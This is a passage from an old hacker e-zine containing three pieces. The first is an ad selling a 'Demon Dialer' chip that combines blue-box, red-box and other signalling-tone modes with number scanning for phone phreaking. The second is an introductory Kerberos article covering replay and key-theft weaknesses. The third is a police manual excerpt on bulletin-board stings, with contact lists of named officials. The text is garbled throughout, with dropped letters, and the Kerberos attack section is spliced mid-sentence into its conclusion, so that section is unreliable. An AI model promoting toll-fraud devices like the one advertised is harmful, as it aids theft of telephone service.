  1439. | Member of: PHD, Alliance Crew            Associated with: Too many to list |
  1440. |                                                                            |
  1441. | Hello's go out to: Dark Druid, Erik Bloodaxe, Mack Hammer, Knight Lightning|
  1442. |                    Marina, Randy S. Hacker, Nikodemus... And all the rest. |
  1443. |                                                                            |
  1444. | This submission for information purposes only, NOT FOR ANY OTHER PURPOSE   |
  1445. \____________________________________________________________________________/
  1446.  
  1447.  
  1448. DEMON DIALER SPECS
  1449. ------------------
  1450. The chip contains a blue-box, DTMF dialer, C4 and ATF1 tonegenerator and much
  1451. more.  Just about the whole stratum of phone-phreak knowledge has been
  1452. incorporated into this device and because the chip contains an amount of RAM
  1453. memory, new signalling systems can be built in.  The ideal tool for today's
  1454. phone-phreak.
  1455.  
  1456. In the sequel is a list op all the abilities of the MC68HC705C8P/DD, as it is
  1457. officially called.  Furthermore a small overview of what it takes to put a nice
  1458. little box around it.
  1459.  
  1460.  
  1461. THE MC68HC705C8P/DD
  1462. -------------------
  1463. It's a Motorola processor of the 68705 kind, programmed by us.  It only
  1464. requires an additionla matrix keyboard of 3 by 4 keys, a couple of resistors,
  1465. and a D/A convertor with a filter.  Hook it up to 5 Volts and there ya go, da
  1466. perfect phone-phreakin' tool.
  1467.  
  1468. If you power up the chip it's just a DTMF dialer, and if you don't enter the
  1469. right code that's exactly what it will stay.  Only after the code's been
  1470. entered (which by the way is a different one for each chip) you can switch to
  1471. the other modes:
  1472.  
  1473. o DTMF, RedBox, C3, C4, C5, R1, R2 (both directions) and ATF1 modes built-in.
  1474.   2 new sistems can be programmed later.
  1475.  
  1476. o Guard banding:  Every tone or double-tone can be combined with a third
  1477.   frequency.
  1478.  
  1479. o Advanced Macro capabilities. Macro nesting is possible.
  1480.  
  1481. o All settings are stored in RAM if the machine is switched off.
  1482.  
  1483. o For DTMF, C5 and C3, both space and mark timing are possible.
  1484.  
  1485. o C3 has programmed space and mark frequency and is thus useable as a general
  1486.   purpose signalling system.  Furthermore pulse-dialing is possible through a
  1487.   relais-control-signal.
  1488.  
  1489. o User-Defined-Modes can make use of variable timing and frequencies.
  1490.  
  1491. o Tone-sweep and the ability to set starting frequency and step-size.  Also
  1492.   useable for continuous sweep.
  1493.  
  1494. o Phone number scan with variable step size for all signalling systems
  1495.  
  1496.  
  1497. CONSTRUCTION
  1498. ------------
  1499. The MC68HC705C8P/DD is at the heart of a do-it-yourself bluebox, but a number
  1500. of elements you will have to build yourself.  You're going to have to connect
  1501. the matrix keyboard as well as a simple D/A convertor and a speaker.  The total
  1502. cost of hardware to be added shouldn't exceed the amount of 50 guilders.  On
  1503. the flip page is the schematic [heheh..] and shipped with the chip is a
  1504. comprehensive set of datasheets and a software manual both in English and
  1505. Dutch.  The hardware description pays more attention to the D/A convertor,
  1506. filter, keypad etc.  than does this short article.  Furthermore it contains
  1507. schematics to make the device run on 3 volts and drive an 8 ohm speaker.
  1508.  
  1509.  
  1510. HOW TO OBTAIN THE CHIP?
  1511.  
  1512. The chip costs 250 guilders, including shipping, a Dutch and English manual of
  1513. the software and a detailed description of the hardware.  Pay the mailman.  For
  1514. more information call +31-20-6001480.
  1515.  
  1516. *** NOTE: $1.00 US ~ 1.80 guilders
  1517.  
  1518.  
  1519. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1520.  
  1521.  
  1522.  
  1523.  
  1524.  
  1525.  
  1526.  
  1527.               The Kerberos Authentication System - An Intoduction
  1528.                                     by x0d
  1529.  
  1530.  
  1531. Introduction
  1532. ------------
  1533.         This article is an introduction to Kerberos, an authentication system
  1534. written at MIT.  It covers the security problems that motivated the creation of
  1535. Kerberos, the basic mechanisms of the Kerberos protocol and finally some
  1536. security flaws in the kerberos ystem.  The first section covers some network
  1537. security strategies and the problems encountered.  The second section goes
  1538. through the Kerberos protocol in a step by step fashion.  The final section
  1539. briefly touches on some known attack plans in breaking Kerberos as well as some
  1540. limitations it has when adapted to other environments.
  1541.  
  1542. Motivation
  1543. ----------
  1544.         Networks allow many computers to convey information amoung each other.
  1545. Individual machines need not provide all the services needed by its users but
  1546. can rely on remote machines to provide services.  Special program called
  1547. servers can be run on a specif ed machine, and anytime that service is needed a
  1548. program on the remote machine, called a client, can request the service on
  1549. behalf of the local machine.  The idea of networked servers and clients is well
  1550. integrated into modern computing.  Sometimes a ser er deals with importaint
  1551. personal information such as mail and must know the identity of the user
  1552. requesting the data.  More than that the server would like to be sure that the
  1553. user requesting the service is indeed who he says he is.
  1554.  
  1555.         Remote servers can authenticate clients trying to access their sevices
  1556. in several ways.  First the remote server can do nothing.  In this case the
  1557. remote server is depending on the clients host for authentication.  An example
  1558. of this is the smtp service
  1559.  
  1560.         When a client connects to this server it is assumed that all data it
  1561. receives is valid.  If the client side decides to give false information the
  1562. service will gladly accept it, resulting in forged mail.  It is up to the
  1563. client's host to keep this from appening.  A second example is the yp service.
  1564. Unless carefully set up any client can connect to and use the remote yp
  1565. database server and it is up to the clients host to keep unauthorized users
  1566. from using the client (through permissions on the client p ogram).  A more
  1567. secure authentication can be achieved by having the client's host machine
  1568. authenticate itself to the service but then trust any information that host
  1569. passes on about the identity of the client.  This is the strategy of rlogin,
  1570. rsh and the system of 'trusted' hosts.  If a connection comes from a rlogin
  1571. client on a trusted machine (which is weekly authenticated by the fact that it
  1572. has the correct address) then the service will allow the client to login to an
  1573. account of the same name.  This trategy fails if the clients machine can forge
  1574. its address (and hence bypass the authentication) or if the security on the
  1575. client's machine has been bypassed allowing the client to take on any username.
  1576. In a more ideal authentication system a compromise in security on one machine
  1577. wouldn't lead to a compromise in secuity on a remote system.
  1578.  
  1579.         The authentication system that Kerberos uses is based on an individual
  1580. authentication of each client.  In this system a client must authenticate
  1581. itself for each service it uses.  The remote login service offered by the
  1582. telnetd server is an example of th s.  The client cannot login to a remote
  1583. account through the service unless the proper acount name and password where
  1584. entered.  Although this may sound like a secure operation there is one major
  1585. flaw to it.  Whenever a password is transmitted over the ne work it is in
  1586. danger of being compromised.  A third party may be monitoring the network
  1587. traffic as it goes by and see the login name and password as they are being
  1588. used.  This can be more dangerous than using the trusted host paradigm.
  1589.  
  1590.         It is important to look at the environment that Kerberos was designed
  1591. for when looking at Kerberos.  Kerberos was designed at MIT for MIT's Project
  1592. Athena.  The hardware environment there consists of many privately owned and
  1593. many publically accessible w rkstations connected in a network with along with
  1594. several time-sharing machines which also act as file servers.  Many services
  1595. are available with servers on many machines in the network.  For example many
  1596. machines may be running a (modified) rlogin serve .  Security of the
  1597. workstations cannot be trusted.  They may be privately owned machines and the
  1598. owner may be free to bypass all security, or they may be rebooted with a
  1599. different root file system.  Once a user has bypassed the general securities on
  1600. the machine he is free to alter his identity, alter his machines address, and
  1601. even eaves-drop over the network.
  1602.  
  1603.         The goals in creating the Kerberos authentication system where based on
  1604. the environment.  A machines address could not be trusted.  The user-id of a
  1605. user on a particula machine could not be trusted.  Any information sent over
  1606. the network should be usele s in attempts to impersonate another user.
  1607.  
  1608.  
  1609.      c       - client                     Kx      - x's private key
  1610.      s       - server                     Tc,s    - Ticket for c to use s
  1611.      Kc,s    - key shared                 Ax      - Authenticator for client x
  1612.                between c and s            {abc}Kx - abc encrypted in key Kx
  1613.      tgs     - ticket granting server     life    - a tickets lifespan
  1614.      kerb    - authentication server      addr    - a clients address
  1615.  
  1616.                            Figure 1.  Abbreviations.
  1617.                            -------------------------
  1618.  
  1619.         The kerberos system itself is implemented as a collection of servers.
  1620. The two major types of severs in the Kerberos system are authentication servers
  1621. (called kerberos servers) and ticket granting servers (often refered to as tgs
  1622. in this paper).
  1623.  
  1624.         Kerberos uses a system of private keys, tickets and authenticators.  A
  1625. private key is a secret key used for encryption and decryption.  Reading a
  1626. message encrypted in certain key is only possible if the key is known,
  1627. similarly encrypting a message in a certain key is only possible if the key is
  1628. known.  Kerberos currently uses a modified DES algorithm known as DES cypher
  1629. block chaining.  Normally DES encrypts each block (an arbitrary group of bits)
  1630. seperately but in cypher block chaining encryption of t e second block depends
  1631. on the contents of the first block.  A ticket is a message (See Figure 2)
  1632.  
  1633.  
  1634.                    {Tc,s} Ks = { s, c, addr, life, Ks,c } Ks
  1635.  
  1636.                               Figure 2.  Ticket.
  1637.                               ------------------
  1638.  
  1639. that allows a client to use a service in much the same way a movie ticket
  1640. allows a person to be admitted into the theatre.  To prevent a ticket from
  1641. being altered it is encrypted in a key known only to the server that the ticket
  1642. is intended for.  The ticket contains the name of the serve, the name of the
  1643. client who can use the ticket, the address of that client, the lifetime for
  1644. which t e ticket can be used (tickets usually expire 8 hours after the initial
  1645. login), and the key that is shared between the server and client.  An
  1646. authenticator is a message which contains identification information about a
  1647. client.  Authenticators are always en rypted in a key shared by the client
  1648. sending it and the server it is sent to.  Authenticators contain the clients
  1649. name, the clients address, and a timestamp.  All the clients and servers using
  1650. kerberos must have loosely synchronized clocks.  Any authent cator older than
  1651. five minutes is invalid.
  1652.  
  1653.  
  1654.                     {Ac} Ks,c = { c, addr, timestamp } Ks,c
  1655.  
  1656.                            Figure 3.  Authenticator.
  1657.                            -------------------------
  1658.  
  1659.  
  1660. Mechanics
  1661. ---------
  1662.         Using kerberos involves three processes.  First a user must log in.
  1663. When logging in the user's client receives a ticket to use the ticket granting
  1664. service upon being authenticated.  This ticket allows him to use the ticket
  1665. granting service which is use in getting tickets for any other service that the
  1666. client wants to use.  After getting a ticket from the ticket ganting server the
  1667. client can use that server until the ticket expires.  Since any new ticket
  1668. granted has a lifetime that is the same as the ticket used to acquire it, all
  1669. tickets expire 8 hours after the initial login (with the exception of certain
  1670. tickets with specified shorter lifespa ).  This means that if a user remains
  1671. online for 8 hours he must re-login.  Besides having to re-log in every 8 hours
  1672. the entire process is transparent to the user.  The login is much like a login
  1673. to a non-kerberos system and the additional tickets aquir d during the session
  1674. are all aquired without the users intervention.
  1675.  
  1676.         The goal of the login process is to aquire a ticket to use the ticket
  1677. granting service and to authenticate the user.  If the user is unable to be
  1678. authenticated he should not be able to access the ticket granting server.  When
  1679. the user walks up to the co puter and enters his login name a message is sent
  1680. to the authentication server containing the client's name (that is, the name of
  1681.  
  1682.  
  1683.  
  1684.                 Client        ---- c, tgs ---->            Kerb
  1685.                 Client   <-- { Kc,tgs {Tc,tgs}Ktgs }Kc --  Kerb
  1686.  
  1687.                                Figure 4.  Login.
  1688.                                -----------------
  1689.  
  1690.  
  1691. the user) and the (See Figure 4)ticket granting service which the client wishes
  1692. to use.  The kerberos server then builds a ticket (noting the clients name and
  1693. address in it) for that tgs and encrypts it in a special key that the tgs
  1694. knows.  It also creates a session key which will be u ed in conversations
  1695. between the client and the tgs.  It looks up the clients name and a
  1696. corresponding key derived from the users password in its database.  It then
  1697. encrypts the session key and the ticket in the clients secret key and sends it
  1698. back to the client.  The user is then prompted for his password.  The secret
  1699. key is then computed from his password and used to decrypt the message from the
  1700. kerberos server.  If the user typed in the wrong password the message will not
  1701. decrypte properly.  If the co rect password is entered the client now holds a
  1702. ticket to use the tgs and a key to use when sending messages to the tgs.
  1703.  
  1704.           Once a client has a ticket to use the tgs it may request more tickets
  1705. for other services.  The client first builds up an authenticator and encrypts
  1706. it in the session key.  It then sends a message to the tgs containing the name
  1707. of the requested service the ticket to use the tgs and the authenticator.  The
  1708. tgs first decrypts the ticket with its secret key.  In the ticket is the
  1709.  
  1710.  
  1711.                  Client -- s, {Tc,tgs}Ktgs, {Ac}Kc,tgs --> TGS
  1712.                  Client   <-- { {Tc,s}Ks, Kc,s }Kc,tgs --  TGS
  1713.  
  1714.                           Figure 5.  Getting More Tr.
  1715.                           ---------------------------
  1716.  
  1717. session key the tgs sends back to the client the ticket and the new key all
  1718. encrypted in the key shared between the client and the tgs.  When the client
  1719. receives the message it just decrypts it and has a ticket for the requested
  1720. service and a key to use when talking to it.
  1721.  
  1722.         To use a service the client first authenticates itself.  It does this by building an authenticator, encrypting it in the key shared between the client and the server and sending it to the server along with the ticket to use that server.  When the server
  1723. gets the ticket it just decrypts the ticket,  uses the shared key contained in the ticket to decrypt the authenticator, and compares the information contained in them.  If everything matches the client is allowed to use the service and subsequent request
  1724.  will be allowed.  In some cases the client would also like to make sure it is
  1725. indeed talking to the real server and not an imposter.  The server can validate
  1726. itself to the client by taking the timestamp from the authenticator, adding one
  1727. to it, and sending it back.  If the service was ot the real thing, it would not
  1728. have the servers private key, would not be able to read the ticket and get the
  1729.  
  1730.  
  1731.                  Client   --  {Ac}Kc,s, {Tc,s}Ks -->    Server
  1732.                  Client   <-- { timestamp + 1 }Kc,s --  Server
  1733.  
  1734.                        Figure 6.  Getting More Tickets.
  1735.                        --------------------------------
  1736.  
  1737.  
  1738. shared key, would not be able to read the timestamp and add one to it, and
  1739. would not be able to re-encrypt it and send it back.  If the client recieves
  1740. the incremented timestamp back it can be sure that the server did indeed have
  1741. the servers private key.
  1742.  
  1743.         Along with these three important processes there are many other
  1744. supporting processes in the kerberos system.  For example there are the
  1745. database management processes for adding new users and changing passwords and
  1746. there are slave kerberos and tgs server which contain copies of the kerberos
  1747. and tgs databases to avoid a bottlenecks.  There is also a kerberos network
  1748. file system which follows a slightly different protocol in order to avoid the
  1749. large number of encryptions that using the kerberos protocol w uld cause.
  1750.  
  1751. Security Flaws
  1752. --------------
  1753.         Although Kerberos increases the security of the network it is used on,
  1754. it is not flawless.  There are several proposed line of attacks that could be
  1755. used against the Kerberos protocol, and several limitations that it suffers
  1756. when used in an environment ther than the one it was designed for.
  1757.  
  1758.         Kerberos was designed for a network consisting of many workstations
  1759. being used by individual users connected to a few large time-sharing machines
  1760. that provide services such as file storage and mail delivery.  The keys
  1761. accumulated by the client during the session are stored in the /tmp directory
  1762. in the current version of Kerberos.  If more than one user was logged in on the
  1763. same machine it would be possible for one user to view another users session
  1764. keys and use them to impersonate that user.  On the wor stations Kerberos was
  1765. first implemented on the /tmp directory was located on the workstation itself,
  1766. but if a diskless workstation was used the keys would have to go over the
  1767. network to their destination, and back to the workstation whenever accessed.  E
  1768. en on workstations with disks, the keys may be swapped out of memory onto the
  1769. remote file server if virtual memory is supported.  These keys would be easy to
  1770. intercept by simply watching the network for access to and files in the
  1771. temporary directory or f r swapped out pages.  Use of Kerberos is also
  1772. problematic when on a large machine with multiple addresses, since each ticket
  1773. holds information about only one address.  On systems with more than one user
  1774. it is possible for users to find out the keys of ot er users logged in at the
  1775. same time if they can bypass the security of the temporary files in which they
  1776. are stored.  Once a user has these keys he can impersonate the other user.
  1777.  
  1778.         One of the most popular attacks on the Kerberos protocol is replay.  An
  1779. eaves-dropper can watch as a known client sends an authenticator and ticket to
  1780. a server.  When that client logs out the eaves-dropper can change his address
  1781. to the address the client was using (and hence the address in the authenticator
  1782. and the ticket) and change the client name to that of the client.  Then the
  1783. ticket and authenticator can once the security of one of its hosts has been
  1784. compromised.  Kerberos was designed to maintain network se urity even in these
  1785. circumstances.  The mechanisms of encrypted authenticators and tickets was
  1786. looked at and in particular the pocesses of getting a ticket for the ticket
  1787. ganting service and getting tickets for arbitary services and then using the
  1788. services it was looked at.  Finally some known flaws and limitations of
  1789. Kerberos where looked at and it was seen that Kerberos is not yet completely
  1790. secure from attacks.
  1791.  
  1792.  
  1793.  
  1794. Bibliography
  1795. ------------
  1796.  
  1797. 1.  C.  H.  Meyer and S.  M.  Matyas, Cryptography:  A New dimension in
  1798.     Computer data Security, John Wiley and Sons, New York (1982).
  1799.  
  1800. 2.  N.  Koblitz, A Course in Number theory and Cryptography, Springer-Verlag,
  1801.     New York (1987).
  1802.  
  1803. 3.  A.  Salomaa, Public-Key cryptography, Springer-Verlag, Berlin (1990).
  1804.  
  1805. 4.  J.  G.  Steiner, C.  Neuman and J.  I.  Schiller, Kerberos:  An
  1806.     Authetication Service for Open Network Systems (Mar.  1988).
  1807.  
  1808. 5.  S.  M.  Bellovin and M.  Meritt, Limitations of the Kerberos Authentication
  1809.     System, Proc.  Winter USENIX Conference, Dallas (1991).
  1810.  
  1811.  
  1812. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1813.  
  1814.  
  1815.  
  1816.  
  1817.  
  1818.  
  1819.                          Computer Crime Investigation
  1820.                             submitted by: cdmorgan
  1821.  
  1822.                  Copied from "Dedicated Computer Crime Units"
  1823.                 (A National Institute of Justice Publication!)
  1824.  
  1825.  
  1826.                             Bulletin Board Stings 
  1827.                             ---------------------
  1828.  
  1829. While most bulletin boards have been established for legitimite purposes there
  1830. are also "pirate" or "elite" boards that contain illegal information or have
  1831. been established for an illegal activity.  Security on these boards is tightly
  1832. controlled by the owners.  With these bulletin boards, users usually have to
  1833. contact the owner directly to obtain a password for access to different levels
  1834. of the system.  A degree of trust must therefore be established before the
  1835. owner will allow access to the board, and the owners develop power over who can
  1836. use the system.
  1837.  
  1838. These boards have a variety of information on them including the following:
  1839.  
  1840.   * Stolen credit card account numbers 
  1841.   * Long distance telephone service codes 
  1842.   * Telephone numbers to main frame computers, including passwords   
  1843.   * Procedures for making illegal drugs and explosives  
  1844.   * Hacking programs  
  1845.   * Tips on how to break into computer systems 
  1846.   * Schematics for electronic boxes (e.g. Blue Box)
  1847.  
  1848. These boards are obviously a threat to communities, and their exsistance has
  1849. gained the attention of police departments.
  1850.  
  1851. Sting Operations with Bulletin Boards
  1852.  
  1853. Members of the Maricopa County,Arizona, Sheriff's Department were the first in
  1854. the country to establish such a board.  Their board resulted in over 50 arrests
  1855. with the usual charge being telecommunications fraud.  In September, 1985, the
  1856. Fremont Police Department established a bulletin board for the primary purpose
  1857. of gathering intelligence on hackers and phreakers in the area.  The operation
  1858. was partially funded by VISA, Inc., with additional support from Wells Fargo
  1859. Bank, Western Union, Sprint, MCI, and ITT.
  1860.  
  1861. After Establishing their bulletin board, They advertised it on other boards as
  1862. the newest "phreak board" in the area.  Within the first four days over 300
  1863. calls were received on the board.  During the next three months, the board
  1864. logged over 2,500 calls from 130 regular users.  Through the bulletin
  1865. board,they persuaded these groups that they had stolen or hacked long-distance
  1866. telephone service codes and credit card account numbers.  (provided by the
  1867. aforementioned companies).  They were readily accepted and were allowed access
  1868. to other pirate boards in the area.
  1869.  
  1870. The board was operated for a total of three months.  During that period, over
  1871. 300 stolen credit card account numbers and long distance telephone service
  1872. codes were recovered.  Passwords to many government, educational, and corporate
  1873. computers were also discovered on other boards.
  1874.  
  1875. The operation resulted in the apprehension of eight teenagers in the area who
  1876. were charged with trafficking in stolen credit card accounts, trafficking in
  1877. stolen long distance telephone service codes, and possession of stolen
  1878. property.  Within the next week, seven more teenagers in California and other
  1879. states were arrested based on information from this operation.
  1880.  
  1881. It was estimated that this group had been illegally accessing between ten and
  1882. fifteen businesses and institutions in California.  They were regularly
  1883. bypassing the security of these systems with stolen phone numbers and access
  1884. codes.  One victim company estimated that it intended to spend $10,000 to
  1885. improve its security and data integrity procedures.  Other victimized
  1886. businesses were proceeding along the same lines.
  1887.  
  1888. Conclusions
  1889.  
  1890. There are several reasons for conducting Sting operations of this type.  One of
  1891. the most important is that it provides a proactive method of identifying
  1892. hackers and phreakers in the area.  These groups are particularly hard to find
  1893. since they operate in closed circles with personal networks developed from
  1894. friendships.
  1895.  
  1896. Another byproduct of these operations is the publicity surrounding the cases.
  1897. Sting operations result in a considerable amount of attention from the media.
  1898. The publicity has the effect of closing down other pirate boards in the area.
  1899. One of the greatest fears of these offenders is that their systems will be
  1900. taken, and in the Fremont operation over $12,000 of computer equipment was
  1901. seized.  The publicity associated with these seizures seems to be the primary
  1902. reason for others to stop their pirate boards.
  1903.  
  1904. These operations also lead to other types of offenses.  In Fremont, for
  1905. example, drug and alcohol cases were developed as a result of the Sting
  1906. operation.  This has been typical of these operations.
  1907.  
  1908. The Sting operations with bulletin boards have been criticized because
  1909. teenagers, rather than hardened criminals, are arrested.  Many hackers believe
  1910. that they have a right to the data in other systems and that their activities
  1911. are not illegal since the companies can afford the losses.  On the other hand,
  1912. as one investigator observed, the hackers of today may be the sophisticated
  1913. computer criminals of tomorrow.  It is therefore important to set a lesson
  1914. early in their careers steering them away from these offenses.
  1915.  
  1916.  
  1917.  
  1918.                    Public Sector Computer Crime Associations
  1919.                    -----------------------------------------
  1920.  
  1921. Federal Computer Investigations Committee (FCIC)
  1922. c/o U.S. Secret Service Fraud Division, Room 942 
  1923. 1800 G Street, N.W. Washington, D.C. 20223 
  1924. Phone: (202) 535-5850  
  1925. Steve Purdy 
  1926. This committee is compromised of representatives from federal military 
  1927. and civilian law enforcement. This organization meets three times a year 
  1928. for the purpose of enhancing techniques to investigate computer related 
  1929. crimes. The committee strives to develop universal guidelines for these 
  1930. types of investigations. Membership is diverse (U.S. Secret Service, 
  1931. IRS,FBI,Department of Defense, CID, AFOSI, NIS, Department of Labor, and 
  1932. others)
  1933.  
  1934. High Tech Crime Investigator's Association (HTCIA)
  1935. c/o L.A. County Sheriff's Department (Forgery/Fraud Detail) 
  1936. 11515 South Colima Road, Rm. M104 
  1937. Whittier, California 90604 
  1938. Phone: (213) 946-7212 
  1939. Jim Black- President
  1940. Members include federal, state and local law enforcement personnel as 
  1941. well as security managers from private industry. The association brings 
  1942. together private industry and law enforcement officials in order to 
  1943. educate each other about computer related crimes.
  1944.  
  1945. Colorado Association of Computer Crime Investigators 
  1946. c/o Larry Scheideman 
  1947. Lakewood Police Dept.
  1948. Lakewood, Colorado 80226-3105
  1949. Phone: (303) 987-7370
  1950. Founded: 1986 A professional organization including federal, state, and 
  1951. local law enforcement personnel and those persons from the private 
  1952. sector concerned with computer crime. The association assists  law 
  1953. enforcement agencies with resource allocation and 
  1954. intelligence/investigation of computer related crimes. The association 
  1955. also provides training on an individual basis.
  1956.  
  1957. Law Enforcement Electronic Technology Assistance Committee (LEETAC) 
  1958. Office of the State Attorney
  1959. 700 South Park Avenue 
  1960. Titusville, Florida 32781 
  1961. Phone: (407) 269-8112 
  1962. Jim Graham 
  1963. The organization is comprised of 10 prosecutors from the State's 
  1964. Attorney's office, 13 officers representing each municipality in the 
  1965. county, 2 representatives from the sheriff's department, and Nassau. 
  1966. They provide technical expertise to law enforcement regarding computer 
  1967. crimes.
  1968.  
  1969. International Association of Credit Card Investigators (IACCI) 
  1970. 1620 Grant Avenue 
  1971. Norato, California 94945 
  1972. Phone: (415) 897-8800 
  1973. D.D. Drummond  Executive Director 
  1974. Founded: 1968 Members: 2700 Special agents, investigators, and 
  1975. investigation supervisors who investigate criminal violations of credit 
  1976. card laws and prosecute offenders; law enforcement officers, prosecutors 
  1977. or related officials who investigate, apprehend and prosecute credit 
  1978. card offenders. The association's objective is to aid in the 
  1979. establishment of effective credit card security programs; to suppress 
  1980. fraudulent use of credit cards; and to detect and proceed with the 
  1981. apprehension of credit card thieves.
  1982.  
  1983. Economic Crime Investigators Association (ECIA) 
  1984. Glendale Police Dept.
  1985. 7119 N. 57 Drive
  1986. Glendale, Arizona 85301
  1987. Phone: (602) 931-5511 
  1988. Wayne Cerow  
  1989. Members include law enforcement and regulatory personnel. The 
  1990. association focuses on economic crime, including computer related 
  1991. crimes. The association holds a yearly training seminar in order to 
  1992. exchange information, ideas and data on new technological advances.
  1993.  
  1994. Institute of Internal Auditors (IIA)
  1995. 249 Maitland Avenue 
  1996. Altamonte Springs, Florida 32701 
  1997. Phone (407) 830-7600 
  1998. Founded: 1941. Members: 30,000. Staff: 74 Local Group: 183 Professional 
  1999. organization of internal auditors, comptrollers, accountants, educators 
  2000. and computer specialists. Individual members have assisted both 
  2001. state/local police with investigations involving computer crime.
  2002.  
  2003. Computer Law Association, Inc.
  2004. 8303 Arlington Boulevard, Suite 210 
  2005. Fairfax, Virginia 22031 
  2006. Phone: (703) 560-7747 
  2007. Founded: 1973. Members 1200. Lawyers, law students, and others 
  2008. interested in legal problems related to computer communications 
  2009. technology. The association sponsors continuing legal education on 
  2010. computer law. CLA also publishes a reference manual which lists 
  2011. organizations involved with computer law.
  2012.  
  2013. Communications Fraud Control Association (CFCA)
  2014. P.O. Box 23891 
  2015. Washington, D.C. 20026 
  2016. Phone: (703) 848-9760 
  2017. Rami Abuhamdeh (executive director)
  2018. A security organization involved in investigations of telecommunications 
  2019. fraud. Membership includes (a) individual and corporate, (b) associate 
  2020. individual, and (c) vendor.
  2021.  
  2022. National Center for Computer Crime Data (NCCD)
  2023. 2700 North Cahuenga Boulevard
  2024. Los Angeles, California 90068 
  2025. Phone: (213) 874-8233 
  2026. Jay BloomBecker (director)
  2027. Founded: 1978. The center disseminates data and documents in order to 
  2028. facilitate the prevention, investigation and prosecution of computer 
  2029. crime. The center sponsors speakers and seminars. The center is also 
  2030. involved in conducting research and compiling statistics.
  2031.  
  2032. Mis Training Institute
  2033. Information Security Program
  2034. 498 Concord Street 
  2035. Framingham, Massachusetts 01701 
  2036. Phone: (508) 879-7999  
  2037. Information security seminars for information security professionals, 
  2038. EDP auditors, and data processing management. The institute provides 
  2039. both training and consulting services, and has assisted local police in 
  2040. investigations of computer-related crimes.
  2041.  
  2042. Computer Virus Industry Association 
  2043. 4423 Cheeney Street 
  2044. Santa Clara, California 95054
  2045. Phone: (408) 988-3832 
  2046. John McAfee (Executive director) 
  2047. Founded: 1987. Objective is to help identify, and cure computer viruses. 
  2048. The association has worked with state and local law enforcement agencies 
  2049. in the investigation and detection of computer related crimes.
  2050.  
  2051. Information Systems Security Association (ISSA) 
  2052. P.O. Box 71926 
  2053. Los Angeles, California 90071 
  2054. Phone: (714) 863-5583 
  2055. Carl B. Jackson  
  2056. Founded: 1982. Members: 300. Computer security practitioners whose 
  2057. primary responsibility is to ensure protection of information assets on 
  2058. a hands-on basis. Members include banking, retail, insurance, aerospace, 
  2059. and publishing industries. The association's objective is to increase 
  2060. knowledge about information security. ISSA sponsors educational 
  2061. programs, research, discussion, and dissemination of information. The 
  2062. association has regional and state chapters.
  2063.  
  2064. SRI International 
  2065. Information Security Program
  2066. 333 Ravenswood Avenue 
  2067. Menlo Park, California 94025 
  2068. Phone: (415) 859-2378 
  2069. Donn B. Parker  
  2070. Founded: 1947. A staff of senior consultants and computer scientists 
  2071. preform research on computer crime and security and provide consulting 
  2072. to private and government clients worldwide. A case file of over 2,500 
  2073. computer abuses since 1958 has been collected and analyzed. It is 
  2074. available for use by criminal justice agencies and students FREE of 
  2075. charge. An electronic bulletin board, Risks Forum, is operated and 
  2076. sponsored by the Association for Computing Machinery to collect and 
  2077. disseminate information about risks in using computers.
  2078.  
  2079.  
  2080.  
  2081.              List of addresses for more Computer Crime information
  2082.              -----------------------------------------------------
  2083.  
  2084. Mr. Anthony Adamski, Jr.
  2085. Federal Bureau of Investigation
  2086. Financial Crimes Division
  2087. Room 3841
  2088. 10th Street and Pennsylvania Avenue,N.W.
  2089. Washington, D.C. 20535
  2090. (202) 324-5594
  2091.  
  2092. Mr. James R. Caruso
  2093. AT&T Corporate Security
  2094. Room 4B03
  2095. 20 Independance Boulevard
  2096. Warren, NJ 07060
  2097. (201) 580-8304
  2098.  
  2099. Mr. J. Thomas McEwen
  2100. Institute for Law and Justice, Inc.
  2101. 1018 Duke Street
  2102. Alexandria, VA 22314
  2103. (703) 684-5300
  2104.  
  2105. Mr. Ken McLeod
  2106. 504 Edison Avenue
  2107. Buckeye, AZ 85326
  2108. (602) 935-7220
  2109.  
  2110. Sergeant William F. Nibouar
  2111. Technical Crimes Investigation
  2112. Maricopa County Sheriff's Office
  2113. 102 West Madison
  2114. Phoenix, AZ 85003
  2115. (602) 256-1000
  2116.  
  2117. Mr. Donn B. Parker
  2118. SRI International
  2119. 333 Ravenswood Avenue
  2120. Menlo Park, CA 94025
  2121. (415) 859-2378
  2122.  
  2123. Mr. James Fitzpatrick
  2124. Assistant District Attorney
  2125. Philadelphia District Attorney's Office
  2126. Economic Crimes Section
  2127. 1421 Arch Street
  2128. Philadelphia, PA 19102
  2129. (215) 686-8735
  2130.  
  2131. Detective Calvin Lane
  2132. Computer Crime Unit
  2133. Baltimore County Police Department
  2134. 400 Kenilworth Avenue
  2135. Towson, MD 21204
  2136. (301) 887-2225
  2137.  
  2138. Detective Larry L. Scheideman
  2139. Intelligence Division
  2140. Lakewood Police Department
  2141. 445 South Allison Parkway
  2142. Lakewood, CO 80026-3105
  2143. (303) 987-7370
  2144. BBS (303) 987-7388 1200 baud no parity and 1 stop bit
  2145.  
  2146. Mr Jonathan Budd, Project Monitor
  2147. National Institute of Justice
  2148. 633 Indiana Avenue, N.W., Room 801
  2149. Washington, D.C. 20531
  2150. (202) 272-6040
  2151.  
  2152. Special Agent Stephen R. Purdy
  2153. United States Secret Service
  2154. Fraud Division
  2155. 1800 G Street, N.W.
  2156. Washington, D.C. 20223
  2157. (202) 535-5850
  2158.  
  2159. These people were major contributors to these books
  2160.  
  2161.  
  2162.  
  2163.                   Advance Preparations and the Actual Search
  2164.                   ------------------------------------------
  2165.  
  2166. I. Investigative Techniques
  2167.  
  2168.         A. Record Checks:
  2169.  
  2170.            1. Attempt to learn as much information about the
  2171.               personal computer owner as possible, such as:
  2172.               
  2173.               a. Number of occupants in the private residence
  2174.                  and their relationships.
  2175.               b. Employment and educational background to determine
  2176.                  which resident is likely to be a computer user.
  2177.  
  2178.            2. Review telephone records:
  2179.  
  2180.               a. Often computer sites have multiple lines (e.g.,
  2181.                  one for the bulletin board operation, one for
  2182.                  outbound data traffic, and one for voice .
  2183.               b. Long-distance dialing company records are valuable
  2184.                  for determining long-distance access code abuse.
  2185.  
  2186.         B. Informants:
  2187.  
  2188.           1. Use the informant to acquire evidence before a search
  2189.              warrant is prepared.
  2190.  
  2191.           2. Use the informant to better understand the computer habits,
  2192.              skills, and knowledge of the suspect; identify:
  2193.  
  2194.               a. Time of operation of target computer.
  2195.               b. Nature and frequency of illegal activity.
  2196.               c. Type of computer system used by the suspect.
  2197.               d. Identity of criminal associates or conspirators.
